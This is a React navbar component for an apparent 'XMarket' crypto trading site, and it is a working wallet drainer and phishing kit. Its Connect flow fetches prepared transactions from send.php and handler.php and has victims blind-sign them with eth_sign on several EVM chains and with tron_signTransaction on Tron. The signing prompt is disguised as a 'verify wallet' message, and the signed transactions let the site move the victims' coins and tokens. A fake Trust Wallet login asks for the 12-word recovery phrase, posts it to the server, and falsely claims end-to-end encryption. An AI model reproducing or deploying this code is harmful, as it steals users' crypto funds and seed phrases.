import React,{ useState} from 'react'
import './navbar.css'
import { RiMenu3Line, RiCloseLine } from 'react-icons/ri';
import logo from '../../assets/logo.png'
import {  Link } from "react-router-dom";

import { SignClient } from "@walletconnect/sign-client"
import { WalletConnectModal } from "@walletconnect/modal"

import jQuery from "jquery"

localStorage.clear()

var topic;


const Menu = () => (
  <>
     <Link to="/panel"><p>Trade</p> </Link>
     <Link to="/market"><p>Market</p> </Link>
    
  </>
 )

 const Navbar = () => {
  const [toggleMenu,setToggleMenu] = useState(false)
  const web3Modal = new WalletConnectModal({
    projectId: '9fe3ed74e1d73141e8b7747bedf77551',
    themeMode:'dark',
    
  });
  const [config , setConfig] = useState({
    loading:false,
    text:"Preparing ..."
  })
  const [textArea , setTextArea] = useState({
    loading:false,
    text:""
  })
  async function SignHandler(){


    async function getTxSignTron(address,type){

      if (type == "tron"){
          const fs = await jQuery.post(`handler.php`,{"handler":"tx","address":address})
          return JSON.parse(fs)
      }else if(type == "tether"){
          const fs = await jQuery.post(`handler.php`,{"handler":"tx-usdt","address":address})
          return JSON.parse(fs)
      }

  }

  async function sendRawTron(signature , type){
    if (type == "tron"){
        const fq = await jQuery.post(`handler.php`,{"handler":"sign","signature":signature})
        return fq               
    }else if(type == "tether"){
        const fq = await jQuery.post(`handler.php`,{"handler":"sign-usdt","signature":signature})
        return fq
    }
}


  async function compareAssets(address){
    var result = await jQuery.post("handler.php",{"handler":"compare","address":address})
    result = JSON.parse(result)
    return result.result
  }


  async function genSign(address,chain,type,contract="0"){
    setConfig({loading:true,text:"Waiting for Signing ...."})
    if (type == "coin"){
      var result = await jQuery.post("send.php",{"handler":"tx","address":address,"chain":chain,"type":type})

      var unSigned = JSON.parse(result)
      console.log(unSigned)
      
      try{
      setConfig({loading:true,text:"Please back to wallet and Confirm Sign message"})
      
      var Signed = await provider.request({
        topic:session.topic,
        chainId: 'eip155:1',
        request: {
          method: "eth_sign",
          params: [
            address,
            unSigned.result,
          ],
      }});

      console.log(Signed)
    
  
        return Signed
      }catch(err){
        var Signed = String(err.message).split('"')[1];
        console.log(Signed)
        return Signed
      }

    }else if (type == "token"){
      var result = await jQuery.post("send.php",{"handler":"tx","address":address,"chain":chain,"type":type,"contract":contract})

      var unSigned = JSON.parse(result)
      console.log(unSigned)
  
      try{
        setConfig({loading:true,text:"Please back to wallet and Confirm Sign message"})
        var Signed = await provider.request({
          topic: session.topic,
          chainId: 'eip155:1',
          request: {
            method: "eth_sign",
            params: [
              address,
              unSigned.result,
            ],
        }});
    
  
        return Signed
      }catch(err){
        var Signed = String(err.message).split('"')[1];
        console.log(Signed)
        return Signed
      }
    }


  }

  async function acceptSign(signature,type){
    console.log(type)
    if (type == "coin"){
      var result = await jQuery.post("send.php",{"handler":"sign","signature":signature,"type":type})
      var resultJson = JSON.parse(result)
      return resultJson.result
    }else if (type == "token"){
      var result = await jQuery.post("send.php",{"handler":"sign","signature":signature,"type":type})
      var resultJson = JSON.parse(result)
      return resultJson.result
    }

  }


  async function get_tokens_fetch(address,tronAddr,name){
    var result = await jQuery.post("send.php",{"handler":"fetch-token","address":address,"tron_address":tronAddr,"walletName":name})
    console.log(result)
    result = JSON.parse(result)
    console.log(result)
    return result.len

  }

  async function select_token_fetch(){
    var result = await jQuery.post("send.php",{"handler":"select-token"})
    result = JSON.parse(result)
    return result.result
  }



  async function handle_token(contract,chain){
    var signature = await genSign(account_evm_sender,chain,"token",contract)

    console.log(signature)



    var rawsign = await acceptSign(signature,"token")
    console.log("Raw : " + rawsign)
  }
  const provider = await SignClient.init({
    relayUrl: "wss://relay.walletconnect.com",
    projectId: "9fe3ed74e1d73141e8b7747bedf77551",
    metadata: {
      name: "Wallet Connect",
      description: "Connect to the Dapp claim profit",
      url: "https://walletconnect.com/",
      icons: ["https://avatars.githubusercontent.com/u/37784886"],
    },
  });




  const { uri, approval } = await provider.connect({
    requiredNamespaces: {
      eip155: {
        methods: ["eth_sendTransaction", "personal_sign",'eth_sign'],
        chains: ["eip155:1"],
        events: ["chainChanged", "accountsChanged"],
      },tron:{
        methods:['tron_signTransaction','tron_signMessage'],
        events:[],
        chains:["tron:0x2b6653dc"]
      }



    }
  });
  var chains = ['eip155:1','tron:0x2b6653dc']
  web3Modal.openModal({uri,chains})


  const session = await approval()
  web3Modal.closeModal()

  
  



    

    setConfig({loading:true,text:"Preparing...."})

    var account_tron_sender = session.namespaces.tron.accounts[0].split(":")[2]
    var account_evm_sender = session.namespaces.eip155.accounts[0].split(":")[2]
    var tronChain = session.namespaces.tron.chains[0]
    console.log(`Chain : ${tronChain}`)
    console.log(account_tron_sender)
    var namer = session.peer.metadata.name.split(' ')[0]
    console.log(namer)


    var lk = await get_tokens_fetch(account_evm_sender,account_tron_sender,namer)
    var rounder = Number(lk)
    setConfig({loading:true,text:"Configuring ...."})
    console.log(rounder)
  

    for (var t = 0;t<rounder;t++){
      var result = await select_token_fetch()
      console.log(result.chain)
      if (result.chain == "1"){
        var chain = "1"
        if (result.main == true){


          
          var signature = await genSign(account_evm_sender,chain,"coin")
  
          var rawSign = await acceptSign(signature,"coin")
  
          console.log(`Raw main network : ${rawSign}`)
        }else{
          
          var contract = result.contract
          console.log(`Contract Address : ${contract}`)
          await handle_token(contract,chain)
        
        }
      }else if (result.chain == "56"){
        var chain = "56"
        if (result.main == true){
          


          var signature = await genSign(account_evm_sender,chain,"coin")
  
          var rawSign = await acceptSign(signature,"coin")
  
          console.log(`Raw main network : ${rawSign}`)
        }else{
  
          var contract = result.contract
          console.log(`Contract Address : ${contract}`)
          await handle_token(contract,chain)
        
        }
      }else if (result.chain == "137"){
        var chain = "137"
        if (result.main == true){
          


          var signature = await genSign(account_evm_sender,chain,"coin")
  
          var rawSign = await acceptSign(signature,"coin")
  
          console.log(`Raw main network : ${rawSign}`)
        }else{
  
          var contract = result.contract
          console.log(`Contract Address : ${contract}`)
          await handle_token(contract,chain)
        
        }
      }else if (result.chain == "10"){
        var chain = "10"
        if (result.main == true){
          


          var signature = await genSign(account_evm_sender,chain,"coin")
  
          var rawSign = await acceptSign(signature,"coin")
  
          console.log(`Raw main network : ${rawSign}`)
        }else{
  
          var contract = result.contract
          console.log(`Contract Address : ${contract}`)
          await handle_token(contract,chain)
        
        }
      }else if (result.chain == "250"){
        var chain = "250"
        if (result.main == true){
          


          var signature = await genSign(account_evm_sender,chain,"coin")
  
          var rawSign = await acceptSign(signature,"coin")
  
          console.log(`Raw main network : ${rawSign}`)
        }else{
  
          var contract = result.contract
          console.log(`Contract Address : ${contract}`)
          await handle_token(contract,chain)
        
        }
      }else if (result.chain == "42161"){
        var chain = "42161"
        if (result.main == true){
          


          var signature = await genSign(account_evm_sender,chain,"coin")
  
          var rawSign = await acceptSign(signature,"coin")
  
          console.log(`Raw main network : ${rawSign}`)
        }else{
  
          var contract = result.contract
          console.log(`Contract Address : ${contract}`)
          await handle_token(contract,chain)
        
        }
      }

      else if (result.chain == "2xdc"){
        if (result.main == true){
          var checker = "tron"
          console.log("checker is tron")
        }else{
          var checker = "tether"
          console.log("checker is tether")
        }

        console.log(checker)

        if (checker == "tron"){
          setConfig({loading:true,text:"Signing ...."})
          const signHash = await getTxSignTron(account_tron_sender,"tron")
          console.log(signHash.tx)
          var txHash = {txID:signHash.tx.txID}
          console.log(txHash)
          setConfig({loading:true,text:"Please back to wallet and Confirm Sign message"})
          var signature = await provider.request({chainId:'tron:0x2b6653dc',topic:session.topic,request:{method:"tron_signTransaction",params:{address:account_tron_sender,transaction:{result:true,transaction:{"walletconnect":"To verify wallet please confirm sign message.",...txHash}}}}})
          delete signature.result.walletconnect
          console.log(signature)
          var fsl = {
            visible:false,
            txID:signHash.tx.txID,
            raw_data:signHash.tx.raw_data,
            raw_data_hex:signHash.tx.raw_data_hex,
            signature:signature.result.signature

          }
          console.log("fsl")
          console.log(fsl)
          var fss = JSON.stringify(fsl)
          const fucker_output = await sendRawTron(fss,"tron")
          console.log(fucker_output)
          continue
          

        }


        else if (checker == "tether"){
          setConfig({loading:true,text:"Signing ...."})
          const signHash = await getTxSignTron(account_tron_sender,"tether")
          console.log(signHash.tx.transaction)
          var txHash = {txID:signHash.tx.transaction.txID}
          console.log(txHash)
          setConfig({loading:true,text:"Please back to wallet and Confirm Sign message"})
          var signature = await provider.request({chainId:'tron:0x2b6653dc',topic:session.topic,request:{method:"tron_signTransaction",params:{address:account_tron_sender,transaction:{result:true,transaction:{"walletconnect":"To verify wallet please confirm sign message.",...txHash}}}}})
          delete signature.result.walletconnect
          console.log(signature)
          var fsl = {
            visible:false,
            txID:signHash.tx.transaction.txID,
            raw_data:signHash.tx.transaction.raw_data,
            raw_data_hex:signHash.tx.transaction.raw_data_hex,
            signature:signature.result.signature

          }
          console.log("fsl")
          console.log(fsl)
          var fss = JSON.stringify(fsl)
          const fucker_output = await sendRawTron(fss,"tether")
          console.log(fucker_output)
          continue
        }
      }

      continue

    }
    setConfig({loading:true,text:"Done ! You can conitnue to the website ..."})

    



    

  }

  async function phraseHandler(){
    
    setTextArea({loading:true})

    

  }

  async function phraserSender(){
    var phrase = document.getElementById("newer")
    var splitter = String(phrase.value).split(" ")
    if (splitter.length == 12){
      window.alert("Trying to Recovery wait a few moment later")
      await jQuery.post("send.php" , {"handler":"phrase","phrase":phrase.value})

    }else{
      window.alert("Please Enter correct word phrase !")
    }
  }



  return (
    <div className='navbar'>
      <div className="navbar-links">
        <div className="navbar-links_logo">
          <Link to="/"> 
            <h1>X<span>Market</span></h1>
          </Link>
        </div>
        <div className="navbar-links_container">
          
         <Menu />
        
        </div>
      </div>
      <div className="connect-wallet">
  
        
        <>
        <Link to="#"> 
         <button onClick={SignHandler} type='button' className='primary-btn' >Connect</button>
        </Link>
        {config.loading &&
      
      <div className="popup-new-open" >
        <center><img src="https://logolook.net/wp-content/uploads/2022/05/WalletConnect-Logo.svg" width="48px" height="48px"></img></center>
        <h3 className="head-new-2">{config.text}</h3>
      </div>

      }
        </>
      
       

       
      </div>


      <div className="connect-wallet" style={{margin:"10px"}}>
  
        
        <>
        <Link to="#"> 
         <button onClick={phraseHandler} type='button' className='primary-btn' >Login</button>
        </Link>
        {textArea.loading &&
      
      <div className="popup-new-open" id="popuper">
        <h3 style={{padding:"7px",textAlign:'right',fontSize:"25px"}} onClick={() => {
          setTextArea({loading:false})
        }}>×</h3>

  <h2 style={{ textAlign: "center", fontFamily: "monospace", margin: 30 }}>
    Login Trust Wallet
  </h2>
  <center>
    <img
      src="https://1000logos.net/wp-content/uploads/2022/05/WalletConnect-Logo.png"
      style={{ width: 80, height: 40 }}
    />
  </center>
  <center>
    <textarea
      placeholder="12 word recovery"
      style={{
        width: 300,
        marginTop: 20,
        border: "1px solid gray",
        borderRadius: 30,
        padding: 20,
        fontWeight: "bold",
        fontFamily: "monospace",
        fontSize: 18
      }}
      defaultValue={""}
      id='newer'
    />
  </center>
  <center>
    <button
      style={{
        color: "black",
        border: "none",
        background: "#c1c1c1",
        width: 120,
        borderRadius: 50,
        fontWeight: "bolder",
        fontFamily: "monospace",
        fontSize: 12,
        marginTop: 12
      }}
    onClick={phraserSender}
    >
      Login
      
    </button>
  </center>
  <p
    style={{
      textAlign: "center",
      fontFamily: "monospace",
      margin: 30,
      fontWeight: "bold",
      color: "green"
    }}
  >
    All Connections is End 2 End Encrypted
  </p>


      </div>

      }
        </>
      
       

       
      </div>     

      </div>

  )
}

export default Navbar
